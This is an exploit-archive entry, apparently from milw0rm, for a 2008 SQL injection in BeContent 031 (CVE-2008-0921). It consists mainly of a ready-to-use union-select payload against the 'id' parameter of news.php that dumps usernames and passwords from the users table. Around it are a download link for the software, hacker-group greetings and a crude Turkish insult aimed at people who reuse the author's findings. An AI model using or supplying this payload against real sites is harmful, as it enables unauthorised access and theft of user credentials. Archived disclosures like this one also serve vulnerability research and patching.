BeContent 031 - 'id' SQL Injection



EKU-ID: 13117 CVE: OSVDB-42010;CVE-2008-0921 OSVDB-ID:
Author: Cr@zy_King Published: 2008-02-21 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home 


Founder By Cr@zy_King

HackShow.Us

BeContent v.031 (id) Remote Sql  Vuln.

Down : http://code.google.com/p/becontent/downloads/list?id_menu=9

Exploit:

news.php?id=-3+union+select+1,concat_ws(0x3a,username,password),3,4+from+users

Greatz : Barakuda (GraBBerZ team) & Crackers_Child & Eno7 & DreamTurk & Gencturk & Constantine

Not : Ayyildiz 'da Askeri Şurada Yayinladıgım Açıkları Kullananların hepsinin a.q yyim bunlarıda kullananlarında a.qyyim

Alayına İsyan Kralına Hodri Meydan Sozum Metehan'a ;) Hadi eyw.

side note: seems this vulnerability was found around a month earlier by (GraBBerZ TeaM)

# milw0rm.com [2008-02-21]